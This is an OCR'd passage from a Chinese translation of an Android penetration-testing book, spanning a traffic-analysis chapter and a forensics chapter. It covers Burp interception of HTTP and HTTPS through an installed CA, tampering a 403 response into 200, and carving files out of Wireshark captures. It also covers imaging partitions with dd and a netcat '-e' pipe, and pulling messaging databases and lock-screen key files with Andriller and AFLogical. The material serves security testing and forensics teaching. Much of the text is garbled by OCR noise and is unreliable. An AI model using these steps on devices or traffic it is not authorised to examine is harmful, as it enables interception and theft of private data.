这 里 ， -i 代表 接口 。 在 这 种 情况 下 ， 它 从 所 有 可 用 接口 捕获 数据 。 -p 指定 tcpdump 不 将 
设备 置 于 混杂 模式 《这 是 在 执行 噢 探 攻击 时 经 第 使 用 的 模式 ， 并 且 不 适合 我 们 目前 使 用 的 模 
N) 。 在 使 用 -tcpdump 标志 启动 模拟 器 时 ， 我 们 还 可 以 指定 使 用 tcpdump 。 我 们 还 需要 使 
用 -avd 标志 ， 指 定 要 捕获 流量 的 AVD 名 称 。 


emulator -avd Android_Pentesting --tcpdump trafficcapture.pcap 


主动 分 析 


主动 分 析 的 基本 规则 是 ， 使 每 个 请 求 和 响应 通过 我 们 定义 的 中 间 设 备 。 在 这 种 情况 下 ， 我 们 
将 设置 一 个 代理 ， 并 使 所 有 请 求 和 响应 通过 该 特定 人 代理。 此外， 我 们 可 以 选择 操纵 和 修改 请 
求 和 响应 中 的 数据 包 ， 从 而 评估 应 用 程序 的 安全 性 : 


1. X TA HTTP 创建 代理 ， 请 使 用 指定 代理 IP 和 端口 以 及 -http-proxy 标志 启动 模拟 器 。 
由 于 我 们 在 同一 个 系统 上 运行 模拟 器 ， 我 们 使 用 IP 127.0.0.1 和 任何 可 用 的 端口 。 在 这 
种 情况 下 ， 我 们 使 用 端口 8080 © 


emulator -avd Android_Pentesting -http-proxy 127.0.0.1:8080 


2. 在 设备 上 ， 我 们 还 可 以 访问 settings | wi-Fi ， 然 后 长 按 我 们 连接 的 网 络 Wi-Fi。 此 外 
如 果 我 们 使 用 一 个 实际 的 设备 ， 我 们 用 于 拦截 的 系统 应 该 在 同一 个 网 络 上 。 


3. 一 旦 我 们 长 按 Wi-Fi 连接 ， 我 们 将 会 得 到 一 个 类 似 于 下 面 的 截图 所 示 的 屏幕 。 此 外 ， 如 
果 你 使 用 夏 实 设备 执行 此 练习 ， 设 备 需要 与 代理 位 于 同一 个 网 络 。 


Forget network 


Modify network 





4， 一 旦 进入 连接 修改 屏幕 ， 请 注意 ， 代 理 配 置 会 询问 网 络 上 的 设备 的 P 地 址 和 代理 系统 的 


Proxy settings 


Manual 


The HTTP proxy is used by the 
browser but may not be used by the 
other apps. 


Proxy hostname 


192.168.1.5 


Proxy port 
8080 


Bypass proxy for 


IP settings 


DHCP 


Cancel 





但 是 ， 这 些 设 置 仅 存 于 从 4.0 开始 的 最 新 版 本 的 Android 中 。 如 果 我 们 要 在 小 于 4.0 的 
设备 上 实现 代理 ， 我 们 将 必须 安装 第 三 方 应 用 程序 ， 例 如 Play Store 上 可 用 的 
ProxyDroid ° 

一 旦 我 们 在 设备 /模拟 器 中 设置 了 代理 ， 请 继续 并 局 动 Burp 代理 ， 来 拦截 流量 。 下 

面 Options 选项 卡 中 Burp 代理 的 样子 ， 以 便 有 效 拦截 浏览 器 和 应 用 程序 的 流量 。 

我 们 还 需要 检查 不 可 见 的 代理 ， 以 确保 我 们 的 代理 也 捕获 nonproxy 请 求 。 (读者 可 以 
在 Burp 的 网 站 http://blog.portswigger .net/2008/11/mobp-invisible-proxying.html Ba 


细 了 解 不 可 见 代 理 和 非 代理 请 求 。) 


intercept | History Diptions 





7， 为 了 检查 代理 是 否 工作 ， 打 开 浏览 器 并 启动 网 站 。 然后 我 们 能 够 看 到 它 是 否 在 代理 中 被 


Scanner intruder Repeater 


Æ] attify.com 


intencepe | History | Options 


Request to http://attify.com:80 [162.210.70.205) 


| Forward- ] | Drop | | Intercept is on | Action 


三 sh aBa, 














Headers | 


GET / HTTP/1.1 

‘Host: attify.com 

Proxy-Connection: keep-alive 

Accept: text/html,application/xhtml+xml,applice 
X-Requested-With: com.android.browser 
User-Agent: Mozilla/5.0 (Linux: U: Android 4.3% 
¿Jike Gecko) Version/4.0 Mobile Safari/534.30 
Accept-Encoding: gzip,deflate 

Accept-Language: en-US 

Accept-Charset: utf-8, 1so0-8859-1, utf-l6, *;q= 





正如 我 们 在 上 面 的 屏幕 截图 中 看 到 的 ， 我 们 打开 了 URL nttp://attify.com ， 请 求 现 在 显示 在 
Burp Proxy 屏幕 中 。 因此 ， 我 们 成 功 地 拦截 了 来 自 设 备 和 应 用 程序 的 所 有 基于 HTTP 的 请 
来 O 


4.3 HTTPS 代理 拦截 


当 通 过 HTTP 协议 进行 通信 时 ， 上 述 方法 可 以 正常 用 于 应 用 和 流量 器 的 流量 拦截 。 在 
HTTPS 中 ， 由 于 证 书 不 匹配 ， 我 们 将 收 到 错误 ， 因 此 我 们 无 法 拦截 流量 。 

然而 ， 为 了 解决 这 个 挑战 ， 我 们 需要 创建 自己 的 证 书 或 Burp/PortSwigger 并 将 其 安装 在 设备 
上 。 为 了 创建 我 们 自己 的 证 书 ， 我 们 需要 在 Firefox (或 任何 其 他 浏览 器 或 全 局 代理 ) 中 设置 
代理 : 


1. 为 了 在 Firefox 中 设置 代理 ， 请 访问 Tools 中 显示 的 options (Mac 上 
为 Firefox | Preferences ) ， 然 后 访问 Advanced 选项 卡 。 在 Advanced 选项 卡 下 ， 我 们 
单 击 Network 选项 。 


ooe Advanced 


General Tabs ae Applications Privacy Security Sync | (Advanced 
| General Data Choices [vee Update Certificates | 


Connection 


Configure how Firefox connects to the Internet | Settings... 





2. 在 Network 标签 中 ， 我 们 需要 点 击 settings 来 使 用 Firefox 配置 代理 。 


Configure Proxies to Access the Internet 
No proxy 
_) Auto-detect proxy settings for this network 
pe Use system proxy settings 


(*) Manual proxy configuration: 


HTTP Proxy: §127.0.0.1 Port: 8080 8 


ral Use this proxy server for all protocols 
SSL Proxy: 127.0.0.1 Port: 8080 
FIP Proxy: 127.0.0.1 Port: 8080 
SOCKS Host: 127.0.0.1 Port: 8080 


SOCKS v4 [el SOCKS v5 
No Proxy for: 


Example: .mozilla.org, .net.nz, 192.168.1.0/24 


__) Automatic proxy configuration URL: 
Reload 


B [ Cancel | | OK | 





完成 后 ， 在 我 们 的 系统 浏览 器 上 访问 HTTPS 网 站 ， 我 们 能 跟 拦 截 我 们 设备 上 的 流量 。 
这 里 我 们 将 收 到 一 个 The Network is Untrusted 消 息 o 点击 I understand the Risks ? 并 


点 击 Add Exception ° 


然后 ， 单 击 Get certificate ， 最 后 单 击 view ， 然 后 单 击 Export KIRA WEP ° 














| General P 


Certificate Hierarchy 


YF PortSwigger CA 


www. dropbox.com 


Certificate Fields 


FY owww.dropbox.com 
Y Certificate 
Version 

Serial Number 


Certificate Signature Algorithm 


Issuer 
¥ Validity 
Not Before 
Not After 





一 旦 证 书 保存 在 我 们 的 系统 上 ， 我 们 现在 可 以 使 用 adb 将 其 推送 到 我 们 的 设备 。 


adb push portswiggerca.crt /mnt/sdcard/portswiggerca.crt 


现在 ， 在 我 们 的 设备 中 ， 访 问 settings ， 在 Personal 类 别 下 ， 我 们 可 以 找 

到 security ° 一 旦 我 们 进入 security ， 请 注意 ， 你 可 以 选择 从 SD 卡 安 装 证 书 。 
它 使 我 们 可 以 保存 具有 给 定名 称 的 证 书 ， 这 适用 于 所 有 应 用 程序 序 和 浏览 器 ， 基 至 是 
HTTPS 站 点 。 


Certificate name: 


portswigger 


Credential use: 
VPN and apps 


The package contains: 
one user certificate 


Cancel 





通过 返回 到 我 们 的 浏览 器 ， 并 打开 HTTPS 网 站 (例如 https://gmail.com ) o 正 
如 我 们 在 下 面 的 截图 中 可 以 看 到 的 ， 我 们 在 这 种 情况 下 也 成 功 地 拦截 了 通信 : 


f e TEE T i lisi | Üpionm | a. htt DS.) Jfaccounts ge pægle.con — 
| a) Reguesi io rips 


i - : e 
i owad j| ooe j a | Acton Google 
| fare | Params | Headers | 
GET 
Servi celogintservice=sal lApassive=trucicontinueshttp: / /mail google] 
“Sdbtaplenobiledear=1 HTTP/1.1 | 
Host: accounts. google.com 
Connection: keep-alive 
Cache-Control; no-cache 
Pragma: Mo- Cache 
Accept: text/htel applications xhtalémal application ml: get: "raoga 
X-Requested-wWith: con, android. browser | 
User-Agent: Morilla’$.@ (Linux; U; Android 4.3; en-us; Nexus 4 Bude 
Wersion/a.@ Mobile Safari/534, 38 | 
Accept-Encoding: gzip,deflate 
Accept-Language: en-US 
Accept -Charseti utt-8, ioo-8ES9-1, wtt-16, *iq=8. 
Cookie: PREF s[DeGedeBiaSdhlbacas Ue Je bbar Jearl: FFE: TR insidi 
NiDe6Toteng¢ lw nM rH HE- KtqLMs ZF ula ie zagi 2kexF -kH i 
kavHerbeHien 0: GALSe Chi goeiull: GAPS=1:15FaZgLasvyTIJHPro2' vOwas Tae 
| 

















其 它 用 于 拦截 SSL 流量 的 方式 
还 有 用 于 SSL 流量 拦截 的 其 他 方法 ， 以 及 在 设备 上 安装 证 书 的 不 同方 法 。 


其 他 方法 之 一 是 从 Android 设备 的 /system/etc/security 位 置 拉 取 cacerts.bks 文件 。 一 旦 
我 们 拉 取 了 它 ， 我 们 就 可 以 使 用 澳 钥 工具 以 及 Bouncy Castle (位 于 Java 安装 目录 中 ) KA 
成 证 书 。 如 果 你 在 Java 安装 目录 中 找 不 到 Bouncy Castle， 也 可 以 

从 i a releases.html 下 载 并 将 其 放置 在 已 知 路 径 。 此 后 ， 我 
们 需要 挂 载 /system 分 区 作为 读 / 写 分 区 ， 以 便 将 更 新 的 cacerts.bks 证 书 推送 回 设 备 。 然 
而 ， 为 了 使 这 种 更 改 长 期 有 效 ， 如 果 我 们 使 用 模拟 器 ， 我 们 将 需要 使 用 mks.yaffs2 来 创建 一 
个 新 的 system.img 然后 使 用 它 


此 外 ， 还 有 其 他 工具 可 用 于 拦截 Android 设备 的 流量 ， 例 如 C harles Proxy 和 

MITMProxy ( http://mitmproxy.org ) 。 我 强烈 建议 你 在 Burp 代理 的 知识 的 基础 上 尝试 他 
们 ， 因 为 它们 在 可 用 性 方面 是 相同 的 ， 但 是 更 强大 。 在 使 用 Charles Proxy 时 ， 我 们 可 以 直 
接 从 www.charlesproxy.com/charles.crt 下 载 十 书 。 


在 一 些 渗透 测试 中 ， 应 用 程 序 可 能 正在 和 服务 器 通信 并 获得 响应 。 例如 ， 假 设 用 户 试图 访问 
应 用 的 受 限 区 域 ， on Reo 然而， 由 于 用 户 没 有 被 授权 查看 该 区 域 ， 服 
务 器 使 用 403 Forbidden 进行 响应 。 现在 ， 我 们 作为 渗透 测试 人 员 ， 可 以 拦截 流量 ， 并 将 响 

应 从 403 Forbidden XA 200 ok 。 因此 ， 用 户 现在 甚至 能 够 访问 应 用 的 未 授权 区 域 。 修 改 类 
似 响应 的 示例 可 以 在 第 8 章 “ARM 利用 "中 找到 ， 其 中 我 们 将 讨论 可 通过 流量 拦截 利用 的 一 些 其 
他 漏洞 。 


在 应 用 程序 中 ， 保 护 流量 的 安全 方法 是 让 所 有 内 容 通过 HTTPS 传递 ， 同 时 在 应 用 程序 中 包含 
一 个 证 书 。 这 样 做 使 得 当 应 用 程序 aa 时 ， 它 将 验证 服务 器 证 书 是 否 与 应 用 程 
序 中 存在 的 证 书 相 对 应 。 但是， 如 果 有 人 正在 进 ee MAH 42 LE > M h HA MY AE 
添加 的 设备 使 用 的 新 证 书 (如 pon moner 证 书 ) 与 应 用 程序 中 存在 的 证 书 不 匹配 。 在 这 些 
情况 下 ， 我 们 必须 对 应 用 程序 进行 逆向 工程 ， 并 ip 程序 如 何 验证 证 书 。 我 们 甚至 可 能 
需要 修改 和 重新 编译 应 用 程序 。 


4.4 使 用 封包 捕获 来 提取 敏感 文件 


现在 我 们 来 看 看 如 何 使 用 Wireshark 从 流量 数据 中 提取 敏感 文件 。 为 了 做 到 这 一 点 ， 我 们 可 
以 捕获 数据 包 ， 并 加 载 到 Wireshark 进行 分 析 。 


从 网 络 捕获 中 提取 文件 的 基本 概念 是 ， 它 们 含有 指定 文件 类 型 的 关 部 
( multipart/form-data ) ° 以 下 是 从 网 络 流量 捕获 中 提取 任何 类 型 文件 的 步骤 : 


1. 在 Wireshark 中 ， 只 需 访问 编辑 并 从 包 详 细 信 息 中 搜索 字符 事 multipart ° 


第 四 章 对 Android 设备 进行 流量 分 析 


e ® String 


String Options 


© Packet list O Case sensitive 
® Packet details Character set: 
O Packet bytes | ASCII Unicode & Non-Unicode ™ 





2. 一 旦 我 们 收 到 了 向 服务 器 发 送 POST 请 求 的 数据 包 (或 者 极 少数 情况 下 是 GET) »° #74 
单 击 该 数据 包 ， 然 后 点 击 Follow TCP Stream ° 


Ignore Packet (toggle) 
| © Set Time Reference (toggle) 
|| © Time Shift... 
| EP Edit or Add Packet Comment... 


Manually Resolve Address 


Apply as Filter 
Prepare a Filter 
Conversation Filter 
Colorize Conversation 
SC TP 

Follow TCP Stream 





3. WE > ARIE LI Ree A (如 PDF 的 情况 下 为 upper ) ， 从 以 下 选项 中 选择 Rew ， 然 后 使 
用 扩展 名 .pdf REL. 因此 ， 我 们 拥有 了 最终 的 PDF， 通过 Android 设备 上 传 到 网 
站 ， 而 且 我 们 恰巧 在 我 们 的 渗透 中 开启 了 网 络 捕获 。 


i. eo 


Content-Disposition: form-data; name="file_name*; filename="/mnt/sdcard/origpdf. pdf" 


4 6 ob) 
<€ /Length 5 0 R /Filter /FlateDecode >> 


ee AE es Cae 
=faJp. 5 B. 


Entire conversation (28066 bytes) 
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4. 我 们 还 可 以 使 用 其 他 工具 ， 如 Windows 上 的 NetworkMiner (可 
从 http://www.netresec.com/?page=Networ kMiner FTR) j 它 提供 了 一 个 精心 构建 的 GUI 


来 与 之 交互 ， 并 显 式 指定 保存 的 网 络 流量 捕获 文件 。 


N 


` 


Q 


结 


wy 


( 


在 本 章 中 ， 我 们 了 解 了 在 Android 设备 上 执行 流量 分 析 的 各 种 方法 。 此 外 ， 我 们 会 继续 拦截 
来 自 应 用 程序 和 浏览 器 的 HTTP 和 HTTPS 流量 数据 。 我们 还 看 到 如 何 从 网 络 捕获 信息 中 提 
取 敏 感 文件 。 

在 下 一 章 中 ， 我 们 将 介绍 Android 取证 ， 并 使 用 手动 方式 以 及 在 不 同 工 具 的 帮助 下 ， 从 


Android 设备 中 提取 一 些 敏感 信息 。 


第 五 章 Android 取证 


作者 : Aditya Gupta 
译 者 : 飞龙 


协 仅 : CC BY-NC-SA 4.0 


5.1 取证 类 型 


取证 是 使 用 不 同 的 手动 和 目 动 方法 从 设备 中 提取 和 分 析 数 据 。 它 可 以 大 致 分 为 两 类 : 


o FHKE: 这 是 的 一 种 取证 方法 ， 其 中 取证 员 与 设备 交互 并 从 文件 系统 提取 数据 。 该 数 
据 可 以 是 任何 内 容 ， 诸 如 应 用 特定 数据 ， 联 系 人 ， 通 话 记 录 ， 消 息 ，Web 浏览 器 历史 ， 
社交 网 络 用 户 信息 和 财务 信息 。 人 逻辑 采集 的 优点 是 ， 在 大 多 数 情况 下 上 比 物理 采集 更 容 允 
获取 逻辑 信息 。 然 而 ， 在 一 些 情 况 下 ， 该 方法 的 一 个 限制 是 ， 在 这 种 情况 下 的 证 据 (FF 
能 手机 及 其 数据 ) FLA RIE AD RLS © 

o 物理 采集 : 这 意味 着 对 整个 物理 存储 介质 进行 和 逐 位 找 贝 。 我 们 还 可 以 在 执行 物理 采集 时 
定位 不 同 的 单个 分 区 。 与 逻辑 采集 相 比 ， 这 种 方法 慢 得 多 ， 但 更 可 咎 和 可 信赖 。 此 外 ， 
为 了 在 智能 手机 上 执行 物理 采集 ， 检 查 者 需要 熟悉 不 同类 型 的 文件 系统 ， 例 如 Yet 
Another Flash File System 2 (YAFFS2) ，ext3，ext4，rfs 等 。 


5.2 文件 系统 


在 我 们 深入 取证 以 及 从 设备 提取 数据 之 前 ， 我 们 应 该 清楚 地 了 解 文件 系统 类 型 和 它们 之 间 的 
差异 。 正 如 我 们 前 面 讨论 的 ， 在 Android 中 进行 物理 采集 有 点 棘手 ， 一 个 主要 原因 是 文件 系 
统 不 同 。 


Android 文件 系统 的 主 分 区 通 第 被 分 区 为 YAFFS2。 在 Android 中 使 用 YAFFS2 的 原因 是 ， 
它 为 设备 提供 了 优势 ， 这 包括 更 局 的 效率 和 性 能 ， 以 及 更 低 的 占用 空间 。 几 年 前 ， 当 Android 
刚刚 推出 时 ， 取 证 是 平台 上 的 一 个 大 问题 ， 因 为 几乎 没有 支持 YAFFS2 文件 系统 格式 的 取证 
工具 。 


SD 卡 是 FAT32 类 型 ， 是 正 第 系统 用 户 中 的 共 吾 格式。 因此， 为 了 获取 SD 卡 的 映像 ， 可 以 
使 用 任何 第 规 的 数据 采集 取证 工具 。 


制作 副本 或 创建 现 有 数据 系统 映像 的 和 有 名 的 工具 之 一 是 dd， 它 从 原始 来 源 到 系统 进行 逐 块 
复制 。 然 而 ， 由 于 该 工具 的 一 些 缺 点 ， 例 如 缺少 内 存 块 以 及 跳 过 坏 块 ， 会 导致 数据 损坏 ， 

此 不 推荐 在 取证 调查 期 间 使 用 。 在 接 下 来 的 草 节 中 ， 我 们 将 深入 介绍 Android 文件 系统 ， 并 

将 研究 如 何以 最 有 效 的 方式 从 文件 系统 中 提取 数据 。 


Android 文件 系统 分 区 


正如 我 们 在 前 面 的 章节 中 讨论 的 ，Android 基于 Linux 内 核 ， 并 从 Linux 本 身 派生 其 大 部 分 功 
能 和 属性 。 在 Android 中 ， 文 件 系统 被 划分 为 不 同 的 分 区 ， 每 个 分 区 都 具有 重要 意义 。 


为 了 在 Android 设备 上 查看 分 区 ， 我 们 可 以 使 用 adb shell 然后 查看 proc 下 的 mtd 文件 ， 如 
下 面 的 命令 所 示 。 在 一 些 不 存在 mtd 文件 的 设备 中 ， 在 proc FH A—-* 2A partitions 的 
文件 ， 如 下 面 的 命令 所 示 : 


adb shell 
cat /proc/mtd 


以 下 是 在 设备 上 执行 上 述 命令 来 列 出 所 有 分 区 后 的 输出 的 屏幕 截图 。 


root@android:/ # cat /proc/mtd 
dev: size erasesize name 
mtd0: OcSe0000 00020000 "system" 


mtd1: 06100000 00020000 "userdata" 
mtd2: 04000000 00020000 "cache" 





正如 我 们 在 上 面 截图 中 看 到 的 ， 存 在 各 种 文件 系统 分 区 及 其 各 自 的 大 小 。 EKG & Android 
设备 上 ， 我 们 通常 会 看 到 一 些 数据 分 区 ， 

如 system ” userdata °’ cache ’ recovery ? boot °’ pds ， kpanic 和 misc ， 它 们 安装 
在 dev 列 指 定 的 不 同位 置 。 为 了 看 到 不 同 的 分 区 和 类 型 ， 我 们 可 以 在 adb shell 中 键 


入 mount ° 


正如 我 们 在 下 面 的 截图 中 可 以 看 到 的 ， 通 过 执行 mount 命令 列表 ， 所 有 不 同 的 分 区 及 其 位 置 
将 被 挂 载 : 


shel l@android:/ $ mount 

rootfs / rootfs ro,relatime ð 0 

tmpfs /dev tmpfs rw,nosuid,relatime,mode=755 @ @ 
devpts /dev/pts devpts rw,relatime,mode-600 0 0 
proc /proc proc rw,relatime @ @ 

sysfs /sys sysfs rw,relatime ð Ô 


tmpfs /mnt/asec tmpfs rw,relatime,mode=755,gid=1000 @ @ 

tmpfs /mnt/obb tmpfs rw,relatime,mode=/55,gid=1000 @ @ 

/dev/block/sda6 /system ext4 ro,relatime,data=ordered @ 0 

/dev/block/sdbl /cache ext4 rw,nosuid,nodev,relatime,data=-ordered Ò Ô 
/dev/block/sdb3 /data ext4 rw,nosuid,nodev,relotime,data=ordered 6 @ 
/dev/block/sde /mnt/sdcard vfat rw,relatime, fmask=0000, dmask=0000,a1l low_utime=@ 





5.3 使 用 dd 提取 数据 


dd 工具 是 取证 中 最 常用 的 工具 之 一 ， 以 便 为 数据 提取 过 程 创建 映像 。 换 和 句 话说 ， 它 用 于 将 
指定 的 输入 文件 转换 并 复制 为 输出 文件 。 通 第 在 分 析 期 间 ， 我 们 不 允许 与 证 据 直 接 交 互 和 更 
改 。 因此 ， 获 得 设备 文件 系统 的 映像 ， 然 后 对 其 执行 分 析 总 是 一 个 好 的 选择 。 


默认 情况 下 ， dd 工具 在 大 多 数 基于 Linux 的 系统 中 ， 以 及 在 Android 设备 中 

的 /system/bin 中 都 存在 。 如 果 它 不 和 存在 于 你 的 设备 中 ， 您 可 以 安装 BusyBox ， EAE 

K dd 以 及 一 些 其 他 有 用 的 二 进 制 文件 。 你 可 以 从 BusyBox 应 用 程序 

( https://play.google.com/store/apps/details?id=stericson.busybox ) 获取 dd 的 二 进 制 文 
件 ， 或 者 你 其 至 可 以 自己 交 又 编译 。 


dd 的 标准 语法 如 下 : 


dd if = [source file which needs to be copied] of = [destination file to be created] 


复制 的 输入 文件 
o of :这 是 内 容 要 复制 给 它 的 输出 文件 
© bs :这 是 块 大 小 (一 个 数字 ) ， 指 定 dd 复制 映像 的 块 大 小 
© skip : 这 是 在 开始 复制 过 程 之 前 要 跳 过 的 块 数 


让 我 们 现在 继续 ， 并 取得 现 有 分 区 之 一 的 映像 来 进行 取证 


1. 我 们 需要 找到 的 第 一 个 东西 是 不 同 的 分 区 ， 它 们 存在 于 我 们 的 Android 设备 上 ， 就 像 我 
们 之 前 做 的 一 样 这 可 以 通过 查看 /proc/mtd 文件 的 内 容 来 完成 


# cat /proc/mtd 
size erasesize name 
: 00180000 00020000 “pds” 
: O0060000 00020000 “misc” 
i2: 00380000 00020000 “boot” 


: 0040000 00020000 “recovery” 
: ëch 00020000 “system” 

: Oocoo0o0 00020000 “cache” 

: 105c0000 00020000 “Userdata™ 
: 00200000 00020000 "kpanic" 





2， 接 下 来 ， 我 们 需要 了 解数 据 分 区 的 位 置 ， 因 为 这 里 我 们 采集 数据 分 区 的 备份 。 在 这 种 情 
况 下 ， 它 位 于 mtdblock6 。 这 里 ， 我 们 将 启动 dd ， 并 将 映像 存储 在 sdcard 中 ， 稍 后 我 
们 将 使 用 adp pull 命令 拉 取 映像 。 adb pull 命令 只 是 简单 地 允许 你 将 文件 从 设备 拉 取 
到 本 地 系统 。 


#dd if=/dev/block/mtdblock6 of=/mnt/sdcard/data.img 
189696+@ records in 


189696+@ records out 
2424007 bytes transferred in 33.872 secs (2138256 bytes/sec) 





3. 复制 可 能 需要 一 些 时 间 ， 一 旦 复制 完成 ， 我 们 可 以 退出 adb shell ， 访 问 我 们 的 终端 ， 
并 键入 以 下 代码 : 


adb pull /mnt/sdcard/data.img data.img 


4. 我 们 还 可 以 使 用 Netcat 工具 将 映像 直接 保存 到 远程 位 置 /系统 。 为 此 ， 我 们 首先 需要 将 
端口 从 设备 转发 到 系统 。 


adb forward tcp:5566 tcp:5566 


5 同时， 我 们 需要 在 这 里 启动 Netcat 工具 ， 监 听 端 口 5566。 


nc 127.0.0.1 5566 > data.img 


6， 此 后 ， 我 们 必须 执行 adb shell 进入 设备 ， 然 后 启动 dd 工具 ， 并 将 输出 转发 到 Netcat 。 


nc -l -p 5566-e dd if=/dev/block/mtdblock6 


这 将 把 映像 保存 到 系统 中 ， 而 不 是 保存 在 设备 上 的 任何 人 位置， 然后 再 拉 取 它 。 如 果 你 的 手机 
上 没有 dd 二 进 制 ， 你 也 可 以 安装 BusyBox 来 获得 dd a o 

P 该 确保 的 一 件 事 是 ， 检 查 设备 是 否 被 设置 为 在 超级 用 户 模式 下 操作 ， 这 
通常 需要 设备 的 root。 然而 ， 我 们 遇 到 的 所 有 设备 并 不 都 是 root。 在 这 些 情况 下 ， 我 们 将 使 

用 我 们 的 目 定 义 恢复 映像 来 后 动手 机 ， 然 后 root 设备 。 


5.4 使 用 Andriller 提取 应 用 数据 


Andriller 是 由 Denis Sazonov 以 Python 编写 的 开源 多 平台 取证 工具 ， 它 有 助 于 从 设备 中 提取 
一 些 基本 信息 ， 并 且 有 助 于 进行 取证 分 析 。 分 析 完 成 后 ， 将 生成 HTML 格式 的 取证 报告 。 


为 了 下 载 它 ， 我 们 可 以 访问 官方 网 站 http://android.saz.1t/cgi-bin/download.py 并 下 载 必要 
的 包 。 如 果 我 们 在 Linux 或 Mac 环境 中 ， 我 们 可 以 简单 地 使 用 wget 命令 来 下 载 并 解压 软件 
包 。 因为 它 只 是 一 个 Python 文件 ， 以 及 一 些 其 他 必要 的 二 进 制 文件 ， 所 以 没有 必要 安装 它 ; 
相反 ， 我 们 可 以 直接 开始 使 用 它 


$ wget http://android.saz.1lt/download/Andriller_multi.tar.gz 

Saving to: 'Andriller_multi.tar.gz' 

100%) === === == Ss SSeS aa Md 0 574 114KB/s in 9.2s 

2013-12-27 04:23:22 (113 KB/s) - ‘Andriller_multi.tar.gz' saved [1065574/1065574 | 


$ tar -xvzf Andriller_multi.tar.gz 


一 旦 解压 完成 ， 我 们 可 以 访问 Andriller 文件 夹 ， 之 后 只 需 使 用 python andriller.py 运行 

Andriller 的 主要 依赖 之 一 是 Python 3.0。 如 果 你 使 用 Python 2.7 ， 它 预 装 在 大 多 数 操作 系统 
， 你 可 以 从 官方 网 

站 http://python.org/download/releases/3.0/ 或 http://getpython3.com/ 下 载 3.0 版 本 9 


现在 ， 一 旦 我 们 连接 了 设备 ， 我 们 可 以 继续 运行 Andriller.py ， 以 便 从 设备 捕获 信息 ， 并 创 
建 日 志文 件 和 数据 库 。 


$ python Andriller.py 


ee 
装 的 社交 网 络 应 用 程序 。 这 它 检测 到 WhatsApp 应 用 程序 以 及 与 其 相关 联 的 电话 号 码 ， 
因此 它 将 继续 并 拉 取 we 应 用 程序 的 所 有 数据 库 。 


分 析 完 成 后 ， 我 们 将 看 到 类 似 以 下 屏幕 截图 的 屏幕 : 


ocityagupte ot MothBook Pro in “Vol umes. Aditya P layo oa Andri | lar awli 
$ ./Andriller.py 
222232222 Andriller version: alpha-1,.1.1 
Pp Build date: 03/12/2813 
Pp Http: //ondroid, saz. lt 
了 了 General Device Information. 
ADB serial: 192.168.56.102:5555 
Shell permissions: root(su) 
IMEI: null 
Android version: 4.1.1 
Build number: vboxB6p-userdebug 4.1.1 JRO@35 eng. buildbot. 20131111. 205844 test-keys 
Local time: 2013-12-27 05:25:44 IST 
Android time: 2013-12-26 23:55:44 GMT 
>>>>>>>>>> Sync'ed Accounts. 
com.whatsapp: 919920383269 
>>>>>>>>>> Downloading databases... 
Pr Generating report: 
/Volumes/Adi tya P loyground Andri ller sulti/Genymotióon Samsung Galaxy $4_2013-12-27_085.25.45/REPORT . html 
Completed! Press "Enter" to exit. 





如 果 我 们 查看 它 为 我 们 创建 的 HTML 文件 ， 它 将 显示 一 些 关 于 设备 的 基本 信息 ， 如 下 面 的 屏 
幕 截图 所 示 。 它 还 在 文件 夹 db 下 的 同一 文件 夹 目录 中 创建 所 有 数据 库 的 转 储 。 


# This report was generated using Andriller on 27-12-2013 2 
[Andriller Report] | 


192,168.56,102:5555 | 
Shell permissions 
CE | 


Android version: 


a 4.1.1 JROO3S eng.buildbot.20131111.205844 test-keys | 


2013-12-27 05:25:44 IST | 


Android time: 2013-12-26 23:55:44 GMT 


com.whatsapp: 919920383269 


# hitto: android. saz. # 





如 果 我 们 分 析 这 个 应 用 程序 的 源 代码 ， 我 们 可 以 在 Andriller.py 的 源 代码 中 看 到 ， 它 会 检查 
设备 中 存在 的 不 同 包 。 我 们 还 可 以 在 这 里 添加 我 们 自己 的 包 并 保存 数据 库 ， 我 们 希望 
Andriller 为 我 们 寻找 它 


下 面 的 截图 所 示 ， 你 可 以 手动 添加 更 多 要 使 用 Andriller 备份 的 数据 库 。 


i = m = A 7 = Pa A er AA 

z IABASE EATRALT LOW 
k | 7 
Database Links 


DBLS = [ 

' /data/data/com. android. providers.settings/databases/settings.db', 
'/data/data/ com. android. providers. contacts/databases/contacts2.db', 
'/data/data/com. sec. android. provider. logsprovider/databases/logs.db', 
'/data/data/com.android. providers. telephony/databases/mmssms.db', 

' /data/data/com. facebook. katana/databases/fb.db', 
'/data/data/com. facebook. katana/databases/contacts_db2', 

' /data/data/com. facebook. katana/databases/threads_db2', 

' /data/data/com. facebook. katana/databases/notifications.db', 

' /data/data/com. facebook. katana/databases/photos_db', 

' /data/data/com.whatsapp/databases/wa.db', 

'/data/data/ com. whatsapp/databases/msqstore.db', 

'/data/data/kik. android/databases/kikDatabase.db', 

'/data/data/com. bom/files/bbmcore/master.db', 
'/data/system/gesture.key', 

'/data/system/cm_gesture.key', 

'/data/system/ Locksettings.db', 

'/data/system/password.key' 

] 





5.5 使 用 AFLogical 提取 所 有 联系 人 人、 通话 记录 和 短信 


AFLogical 是 由 viaForensics 编写 的 工具 ， 以 便 从 设备 创建 逮 辑 采集 并 将 台 给 取证 员 。 
它 从 设备 中 提取 一 些 关键 组 件 ， 包 括 短信 ， 联 系 人 和 通话 记录 。 


为 了 使 用 AFLogical， 我 们 需要 从 GitHub 

JÆ https://github.com/viaforensics/android-forensics 下 载 项 目的 源 人 代码。 下载 后 ， 我 们 可 以 
eal naa 

问 File | New | Other | Android | Android Project ， 然 后 选择 下 载 的 源 代码 路 径 


一 旦 我 们 将 项 目 导 入 到 我 们 的 工作 区 ， 我 们 就 可 ae 的 设备 上 运行 它 ， 方 法 是 右键 单 击 
项 目 并 选择 “运行 为 Android 应 用 程序 ”。 一 旦 我 们 运行 它 ， 我 们 将 注意 到 ， a 的 设备 上 

的 AFLogical 应 用 程序 提供 了 选项 来 选择 要 提取 什么 信息 Eo 你 将 看 到 
AFLogical 在 设备 上 运行 ， 并 询问 用 户 有 关 要 提取 的 详细 信息 : 


Available providers: 


" CallLog Calls 


Contacts Phones 


MMS 


MMSParts 


SMS 


Select All @ Deselect All Capture 





我 们 将 检查 所 有 东西 ， 然 后 单 击 capture 。 AFLogical 将 开始 从 不 同 来 源 捕获 详细 信息 ， 并 
将 捕获 的 详细 信息 保存 在 SD 卡 中 的 csv 文件 中 。 捕获 过 程 完 成 后 ， 我 们 会 注意 到 一 个 警告 
框 。 


我 们 现在 可 以 查看 我 们 的 SD 卡 路 径 ， 我 们 可 以 找到 保存 的 ,csv 文件 。 


shel L@android: /mnt/sdcard/forensics/20131227 .2415 # -1 

